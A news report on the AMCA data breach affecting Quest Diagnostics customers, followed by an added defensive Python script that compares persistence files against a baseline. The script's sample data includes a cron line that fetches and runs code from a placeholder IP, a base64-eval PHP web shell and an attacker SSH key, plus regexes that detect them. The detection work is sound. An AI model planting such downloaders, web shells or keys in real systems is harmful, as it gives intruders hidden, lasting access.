The American Medical Collection Agency (AMCA) said it is notifying law enforcement and conducting internal reviews following a data breach that exposed the personal information of 11.9 million customers of blood testing company Quest Diagnostics.
The AMCA told The Hill on Monday it is in the process of investigating the breach of its system, which Quest announced earlier in the day involved an “unauthorized user” gaining access to personal information including Social Security numbers, medical data, and financial information. The AMCA is a billing collection service provider for Quest.
“Upon receiving information from a security compliance firm that works with credit card companies of a possible security compromise, we conducted an internal review, and then took down our web payments page,” a spokesperson for AMCA said.
The spokesperson noted the AMCA “hired a third-party external forensics firm to investigate any potential security breach in our systems, migrated our web payments portal services to a third-party vendor, and retained additional experts to advise on, and implement, steps to increase our systems’ security. We have also advised law enforcement of this incident.”
The AMCA “remains committed to our system’s security, data privacy, and the protection of personal information,” the spokesperson said.
Quest said Monday it is “taking the situation very seriously,” and is “committed to the privacy and security of our patients’ personal information.” The company also said laboratory results were not accessed by the unauthorized user.
Quest also said the AMCA has not yet given them “complete information” on the breach, including details on which customers were impacted. The company promised to work with Optum360, another group that utilizes billing services from the AMCA, “to ensure that Quest patients are appropriately notified consistent with the law.”
Stephen Breidenbach, the co-chair of the Cybersecurity, Privacy, and Technology Practice Group at New York law firm Moritt Hock & Hamroff, told The Hill the AMCA needs to zero in on “closing the door” the attacker used to get into the company’s system.
“It’s very important at this stage that AMCA contain the breach and ensure the attacker has not established a method to reenter AMCA’s systems,” Breidenbach said. That includes identifying any software that may have contained the vulnerability that gave the attacker access.
Breidenbach cautioned that even if the AMCA believes it has identified how the attacker got into the system, it needs to make sure there aren’t still other avenues for them to use again.
“Just because the company found and closed the door that the attacker came through does not mean all the doors to the business (e.g., other unpatched programs) are shut,” Breidenbach told The Hill. “It also doesn’t prove that the attacker never established an alternative method of entry, such as installing his/her own software that allows the attacker to reconnect to the network independent of the vulnerability.”
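The point Breidenbach makes, that patching the exploited hole does not rule out an attacker-installed way back in, is usually checked by comparing the persistence locations on a contained host against a known-good baseline. The script below is an added illustration written for this page; it is not tooling from AMCA, Quest, or the firms quoted, and nothing in the article describes how AMCA's portal was actually compromised. The baseline and snapshot dictionaries are constructed sample data standing in for a pre-incident file inventory and a post-containment one (in practice they would be gathered from backups and from the live host, ideally from trusted boot media so a tampered system cannot lie about itself).

```python
"""Added example: diff a post-containment snapshot of persistence locations
against a pre-incident baseline to surface attacker-installed re-entry paths.
All data below is constructed for illustration; paths, keys and the
203.0.113.9 address are placeholders, not indicators from the real incident."""
import hashlib
import re

# Constructed baseline: path -> contents of common persistence locations
# on a Linux web host as they were before the incident.
BASELINE = {
    "/etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",
    "/etc/systemd/system/payments.service": "[Service]\nExecStart=/opt/payments/app\n",
    "/home/deploy/.ssh/authorized_keys": "ssh-ed25519 AAAAC3EXAMPLEKEY deploy@ci\n",
    "/var/www/payments/index.php": "<?php require 'app.php';\n",
}

# Constructed snapshot: the same host after the exploited flaw was patched.
# The attacker has left a cron downloader, an extra SSH key and a web shell.
SNAPSHOT = {
    "/etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",
    "/etc/cron.d/.sysupd": "*/5 * * * * root curl -s http://203.0.113.9/s | sh\n",
    "/etc/systemd/system/payments.service": "[Service]\nExecStart=/opt/payments/app\n",
    "/home/deploy/.ssh/authorized_keys": (
        "ssh-ed25519 AAAAC3EXAMPLEKEY deploy@ci\n"
        "ssh-rsa AAAAB3EXAMPLEKEY2 attacker\n"
    ),
    "/var/www/payments/index.php": "<?php require 'app.php';\n",
    "/var/www/payments/uploads/.cache.php": "<?php eval(base64_decode($_POST['c']));\n",
}

# Content patterns that are suspicious on their own, regardless of the baseline.
WEBSHELL_RE = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*(base64_decode|\$_(?:POST|GET|REQUEST))"
)
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sh|bash)\b")


def fingerprint(content):
    """Stable hash used to detect any change in a file's contents."""
    return hashlib.sha256(content.encode()).hexdigest()


def added_lines(old, new):
    """Non-empty lines present in the new contents but not in the old ones."""
    old_lines = set(old.splitlines())
    return [ln for ln in new.splitlines() if ln and ln not in old_lines]


def content_indicators(path, lines):
    """Flag download-and-execute and web-shell patterns in the given lines."""
    hits = []
    for line in lines:
        if DOWNLOAD_EXEC_RE.search(line):
            hits.append(("download_and_execute", path, line.strip()))
        if WEBSHELL_RE.search(line):
            hits.append(("webshell_pattern", path, line.strip()))
    return hits


def diff_persistence(baseline, snapshot):
    """Return sorted (kind, path, detail) findings for files that appeared,
    changed or vanished between the baseline and the snapshot."""
    findings = []
    for path, content in snapshot.items():
        if path not in baseline:
            findings.append(("new_file", path, ""))
            findings.extend(content_indicators(path, content.splitlines()))
        elif fingerprint(content) != fingerprint(baseline[path]):
            new = added_lines(baseline[path], content)
            # An extra key in authorized_keys is a re-entry path in itself.
            kind = "added_ssh_key" if path.endswith("authorized_keys") else "added_line"
            findings.extend((kind, path, ln.strip()) for ln in new)
            findings.extend(content_indicators(path, new))
    for path in baseline:
        if path not in snapshot:
            findings.append(("removed", path, ""))
    return sorted(findings)


if __name__ == "__main__":
    for kind, path, detail in diff_persistence(BASELINE, SNAPSHOT):
        print(f"{kind:22} {path}  {detail}")
```

An empty result only means nothing changed in the locations you inventoried; it says nothing about locations you did not baseline, about a replaced binary or kernel module, or about a second unpatched application reachable from the internet, which is exactly the "other doors" caveat in the quote above. The baseline has to predate the intrusion, not merely the discovery, or the attacker's additions are already in it.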